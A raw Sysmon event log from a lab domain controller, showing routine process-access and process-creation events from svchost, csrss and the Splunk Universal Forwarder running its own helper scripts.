13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007535Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007534Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007533Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007532Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007531Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007530Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007529Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85EC-5FCF-3F01-000000009101}3356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007528Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85EC-5FCF-3F01-000000009101}3356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007527Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.839{10ACEC4A-85EC-5FCF-3F01-000000009101}3356C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007526Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EC-5FCF-3E01-000000009101}4224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007525Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007524Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007523Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007522Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007521Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007520Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007519Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007518Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007517Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007516Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85EC-5FCF-3E01-000000009101}4224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007515Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.728{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85EC-5FCF-3E01-000000009101}4224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007514Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.733{10ACEC4A-85EC-5FCF-3E01-000000009101}4224C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007513Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.494{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EC-5FCF-3D01-000000009101}744C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007512Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007511Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007510Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 